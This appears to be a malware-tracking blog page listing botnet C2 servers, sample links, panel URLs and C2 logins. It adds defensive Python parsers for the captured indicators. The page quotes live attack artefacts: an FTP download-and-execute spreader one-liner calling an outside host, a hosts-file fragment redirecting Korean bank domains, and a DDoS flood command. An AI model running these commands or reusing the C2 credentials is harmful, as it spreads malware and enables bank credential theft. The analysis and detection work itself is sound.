Resolved : [rageevo.sytes.net] To [190.196.122.227]
PASS pass
NICK raGe|PkfUmcvBta
USER ofmfn "fo8.net" "rage" :ofmfn
JOIN #Ev0-h4cK# ev0h4ck
Now talking in #Ev0-h4cK#
Topic On: [ #Ev0-h4cK# ] [ !xpl 100 1 190 -b 2 0 ]
Topic By: [DJ-L0rD|Ev0| ]
Modes On: [#Ev0-h4cK# ] [ +smntrul 500 ]
samples here
cmd /c echo open windowsupd.serveftp.com 21 >>
70 MB samples
Multiple samples from different sources, including IRC and HTTP bots, banking trojans, RATs, etc. Have fun analysing. Source
klev11.ru (G-Bot hosted in Russian Federation, Moscow, Mchost.ru)
Resolved : [klev11.ru] To [178.208.83.19]
Panel here: hxxp://klev11.ru/g/login.php
Sample here
hosting infos: http://whois.domaintools.com/178.208.83.19
irc.benjol.tk (Linux bots hosted in France, Roubaix, OVH Systems)
Resolved : [irc.benjol.tk] To [37.59.42.103]
Resolved : [irc.benjol.tk] To [46.45.183.189]
The sample begins with a GIF89a signature and the GIF header bytes, then the bot's source comment:
/*
 *
 * NOGROD. since 2008
 * IRC.UDPLINK.NET
 *
 * COMMANDS:
 *
 * .user <password>   //login to the bot
 * .logout            //logout of the bot
 * .die               //kill the bot
 * .restart           //restart the bot
 * .mail <to>
img14.poco.cn (HTTP banking trojan hosted in China, Shanghai, Chinanet Shanghai Province Network)
Resolved : [img14.poco.cn] To [101.226.200.132]
Resolved : [img14.poco.cn] To [101.226.200.130]
Resolved : [img14.poco.cn] To [61.183.42.151]
Resolved : [img14.poco.cn] To [101.226.200.134]
Resolved : [img14.poco.cn] To [101.226.200.152]
Resolved : [img14.poco.cn] To [61.183.42.150]
Samples:
hxxp://www.ccfyi.com/notepad.exe
hxxp://www.ccfyi.com/mstsc.exe
hxxp://www.ccfyi.com/cc.txt
img14.poco.cn GET /mypoco/myphoto/20130323/19/874940020130323195257040.jpg
hxxp://174.139.56.114:54321/1.txt
1.txt (hosts-file style entries that redirect Korean bank domains to 67.198.167.37):
67.198.167.37 keb.co.kr
67.198.167.37 keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 www.citibank.co.kr
67.198.167.37 www.citibank.co.kr
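The 1.txt payload above is a hosts-file fragment: once written into the victim's hosts file, every lookup of keb.co.kr or citibank.co.kr resolves to 67.198.167.37 instead of the bank, with no DNS involved. The following is an added example (not code from the post) that parses hosts-file syntax and flags the pharming pattern: a single routable address that several distinct hostnames are pinned to, plus a watchlist check for domains you care about. The sample inputs are constructed from the listing above and from default Windows hosts content; the thresholds and the watchlist are assumptions.

```python
import ipaddress
from collections import defaultdict

# Constructed from the 1.txt listing in the post; duplicate lines are kept
# as they appear there.
HOSTS_PAYLOAD = """67.198.167.37 keb.co.kr
67.198.167.37 keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 www.keb.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 citibank.co.kr
67.198.167.37 www.citibank.co.kr
67.198.167.37 www.citibank.co.kr
"""

# Constructed benign file for comparison: default Windows entries plus an
# ad-block style sinkhole line.
BENIGN_HOSTS = """# Copyright (c) 1993-2009 Microsoft Corp.
127.0.0.1 localhost
::1 localhost
0.0.0.0 ads.example   # ad-block style sinkhole
"""


def parse_hosts(text):
    """Yield (ip, hostname) pairs from hosts-file syntax, dropping comments,
    blank lines and lines whose first field is not an IP address."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        for name in fields[1:]:
            yield str(addr), name.lower()


def find_pharming(text, min_names=2):
    """Return {ip: sorted hostnames} for every public IP that the file pins
    min_names or more distinct hostnames to.  Loopback, unspecified, private
    and link-local targets are skipped: those are what legitimate hosts files
    (localhost lines, ad sinkholes, lab overrides) point at.  One routable
    address collecting several domains is the banking-trojan pattern."""
    by_ip = defaultdict(set)
    for ip, name in parse_hosts(text):
        addr = ipaddress.ip_address(ip)
        if (addr.is_loopback or addr.is_unspecified or addr.is_private
                or addr.is_link_local):
            continue
        by_ip[ip].add(name)
    return {ip: sorted(names) for ip, names in by_ip.items()
            if len(names) >= min_names}


def hijacked_watchlist(text, watchlist):
    """Names from a watchlist (assumed: the bank domains your users log in
    to) that the file redirects to a public IP, mapped to that IP.  A leading
    'www.' is ignored when matching so both forms of a domain are caught."""
    wanted = {w.lower() for w in watchlist}
    hits = {}
    for ip, name in parse_hosts(text):
        base = name[4:] if name.startswith("www.") else name
        if base in wanted and ipaddress.ip_address(ip).is_global:
            hits[name] = ip
    return hits


if __name__ == "__main__":
    print(find_pharming(HOSTS_PAYLOAD))
    print(hijacked_watchlist(HOSTS_PAYLOAD, ["keb.co.kr", "citibank.co.kr"]))
```

Run it against the live file (C:\Windows\System32\drivers\etc\hosts on Windows, /etc/hosts elsewhere) rather than the dropped 1.txt to confirm whether the redirect actually took effect on a host.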
SKPHTTPBOT (HTTP bot hosted in Croatia, Zagreb, Voljatel Telekomunikacije D.o.o.)
Credits to an anonymous guy from here for the sample. This is another HF HTTP bot. Login: 176.62.0.9. He's already DDoSing someone, look here: 176.62.0.9/cmds.php
$CMD:flood 91.207.5.190 3389 120 15
hosting infos: http://whois.domaintools.com/176.62.0.9
priv8.blackunix.com (IRC botnet hosted in United States, Seattle, The Endurance International Group Inc.)
Resolved : [priv8.blackunix.com] To [209.59.209.111]
Server: 209.59.209.111:5545
Server Password: ownz
Username: xcembmbr
Nickname: priv88qPCdHIIQo
The botnet spreads via FTP:
cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik &echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &bd.exe &exit
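Two artefacts recur across the IRC entries on this page: the client-side login sequence (PASS / NICK / USER / JOIN, as in the rageevo.sytes.net capture) and the FTP spreader one-liner (as above), which builds an ftp script with echo redirects, runs it with ftp -s:, then launches the downloaded file. The following is an added example, not code from the posts, that turns both into structured indicators: server password, nick, ident and channel/key pairs from the handshake, and host, port, credentials, fetched files and the file actually executed from the spreader. The sample inputs are constructed from the captures quoted in the two entries.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed inputs, copied from the captures quoted in the posts
# (handshake from the rageevo.sytes.net entry, spreader from priv8.blackunix.com).
IRC_HANDSHAKE = """PASS pass
NICK raGe|PkfUmcvBta
USER ofmfn "fo8.net" "rage" :ofmfn
JOIN #Ev0-h4cK# ev0h4ck
"""

FTP_SPREADER = (
    "cmd /c echo open pasalles.no-ip.org 21 >> ik &echo user kurt kurt >> ik "
    "&echo binary >> ik &echo get bd.exe >> ik &echo bye >> ik "
    "&ftp -n -v -s:ik &del ik &bd.exe &exit"
)


def parse_irc_handshake(capture: str) -> dict:
    """Pull the C2 login details out of the client side of an IRC session:
    server password, nick, ident and the (channel, key) pairs joined."""
    info = {"password": None, "nick": None, "ident": None, "channels": []}
    for raw in capture.splitlines():
        parts = raw.strip().split()
        if not parts:
            continue
        verb = parts[0].upper()
        if verb == "PASS" and len(parts) > 1:
            info["password"] = parts[1]
        elif verb == "NICK" and len(parts) > 1:
            info["nick"] = parts[1]
        elif verb == "USER" and len(parts) > 1:
            info["ident"] = parts[1]
        elif verb == "JOIN" and len(parts) > 1:
            # JOIN <chan>{,<chan>} [<key>{,<key>}]  (RFC 2812, 3.2.1)
            chans = parts[1].split(",")
            keys = parts[2].split(",") if len(parts) > 2 else []
            for i, chan in enumerate(chans):
                info["channels"].append((chan, keys[i] if i < len(keys) else None))
    return info


@dataclass
class FtpDrop:
    host: str
    port: int = 21
    user: Optional[str] = None
    password: Optional[str] = None
    files: list = field(default_factory=list)     # names fetched with get/mget
    executed: list = field(default_factory=list)  # fetched names launched afterwards


def parse_ftp_spreader(cmd: str) -> Optional[FtpDrop]:
    """Reconstruct the ftp script from an 'echo ... >> file & ftp -s:file'
    one-liner and report where the payload comes from and whether it is run."""
    # Only treat it as a spreader when ftp is actually run with -s:<script>.
    if not re.search(r"\bftp\b[^&]*-s:", cmd):
        return None
    drop = None
    for line in re.findall(r"echo\s+(.+?)\s*>>\s*\S+", cmd):
        parts = line.split()
        if not parts:
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) > 1:
            port = int(parts[2]) if len(parts) > 2 and parts[2].isdigit() else 21
            drop = FtpDrop(host=parts[1], port=port)
        elif drop is None:
            continue  # script lines before 'open' carry nothing useful
        elif verb == "user" and len(parts) > 1:
            drop.user = parts[1]
            drop.password = parts[2] if len(parts) > 2 else None
        elif verb in ("get", "mget") and len(parts) > 1:
            drop.files.append(parts[1])
    if drop is None:
        return None
    # Whatever is chained after the ftp call and matches a fetched file name
    # is the payload being launched.
    for segment in cmd.split("-s:", 1)[1].split("&")[1:]:
        tokens = segment.strip().split()
        if tokens and tokens[0] in drop.files:
            drop.executed.append(tokens[0])
    return drop


if __name__ == "__main__":
    print(parse_irc_handshake(IRC_HANDSHAKE))
    print(parse_ftp_spreader(FTP_SPREADER))
```

The spreader parser is useful beyond this one sample: the same echo-and-ftp-s: construction shows up in any command-line exploit payload that has to pull a binary without a download tool, so the extracted host, credentials and file name can go straight into a block list or a sandbox report.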
Sydnexoyex.us (Pony hosted in Germany, Gunzenhausen, Tt International D.o.o.)
Traffic – by URL:
Sydnexoyex.us/p.exe
Sydnexoyex.us/4df1in1/gate.php
Sydnexoyex.us/DiBU064/s.exe
Sydnexoyex.us/DiBU064/st.exe
j.maxmind.com/app/geoip.js
euntsutviek.
More files here: hxxp://sydnexoyex.us/4df1in1/
Admin Panel: hxxp://sydnexoyex.us/4df1in1/admin.php
hosting infos: http://whois.domaintools.com/176.9.208.113
us2.eclipsemc.com (Bitcoin miner hosted in United States, Kansas City, Joe's Datacenter Llc)
Mining for http://us2.eclipsemc.com:8337
Using CPU (1 threads)
Command Line: "C:file.exe" -o http://us2.eclipsemc.com:8337 -u m1nd_1 -p 13753216
sample here
hosting infos: http://whois.domaintools.com/69.195.155.226
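The command line above is the whole story for a dropped miner: the pool endpoint and the worker credentials are what identify the operator, whatever the binary is renamed to. The following is an added example (not from the post) that parses cpuminer/cgminer-style command lines as seen in sandbox or EDR process logs, handling both short options and --opt=value spellings, the -O user:pass form, and pool URLs with or without a scheme. The sample input is constructed from the command line quoted above; the option table is an assumption covering the common spellings, not every fork.

```python
import shlex
from urllib.parse import urlparse

# Constructed from the command line quoted in the post ("C:file.exe" is the
# path as it appears there, with the separator lost in extraction).
MINER_CMDLINE = '"C:file.exe" -o http://us2.eclipsemc.com:8337 -u m1nd_1 -p 13753216'

# Option spellings shared by the cpuminer / cgminer family (assumption: the
# common forms only; forks add their own).
POOL_OPTS = {
    "-o": "pool", "--url": "pool",
    "-u": "user", "--user": "user",
    "-p": "pass", "--pass": "pass",
    "-O": "userpass", "--userpass": "userpass",
    "-t": "threads", "--threads": "threads",
}


def parse_miner_cmdline(cmdline):
    """Extract pool, worker credentials and thread count from a miner command
    line.  'pool' stays None when no pool option is present."""
    # posix=False keeps Windows backslashes intact; quotes are stripped by hand.
    argv = [tok.strip('"') for tok in shlex.split(cmdline, posix=False)]
    info = {"exe": argv[0] if argv else None, "pool": None, "user": None,
            "pass": None, "threads": None, "pool_host": None, "pool_port": None}
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("--") and "=" in tok:          # --url=...
            key, val = tok.split("=", 1)
        elif tok in POOL_OPTS and i + 1 < len(argv):     # -o ...
            key, val = tok, argv[i + 1]
            i += 1
        else:
            i += 1
            continue
        kind = POOL_OPTS.get(key)
        if kind == "userpass":                           # -O worker:password
            user, _, pw = val.partition(":")
            info["user"], info["pass"] = user, pw or None
        elif kind == "threads":
            info["threads"] = int(val) if val.isdigit() else None
        elif kind:
            info[kind] = val
        i += 1
    if info["pool"]:
        # Pool URLs carry a scheme (http://, stratum+tcp://) or are bare host:port.
        url = info["pool"] if "://" in info["pool"] else "//" + info["pool"]
        parsed = urlparse(url)
        info["pool_host"], info["pool_port"] = parsed.hostname, parsed.port
    return info


def looks_like_miner(cmdline):
    """Triage heuristic: a pool endpoint plus worker credentials is enough to
    flag a process for review regardless of the executable name."""
    info = parse_miner_cmdline(cmdline)
    return info["pool_host"] is not None and (
        info["user"] is not None or info["pass"] is not None)


if __name__ == "__main__":
    print(parse_miner_cmdline(MINER_CMDLINE))
    print(looks_like_miner(MINER_CMDLINE))
```

The pool host and port are the pieces worth alerting on at the network edge; the user and pass fields are the operator's pool account and can be reported to the pool.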
199.229.249.189 (IRC botnet hosted in United States, Atlanta, Colo At 55 Llc)
Remote Host: 199.229.249.189, Port Number: 443
Local users: 131 4000 (current local users 131, max 4000)
Global users: 140 4010 (current global users 140, max 4010)
USER zwin- 127.0.0.1 localhost :Operation Dildos
NICK zwin-WHDKCF|1837|
JOIN #test :
JOIN #test3 :god
NICK zwin-TIGYPT|1952|
Hosting infos: http://whois.domaintools.com/199.229.249.189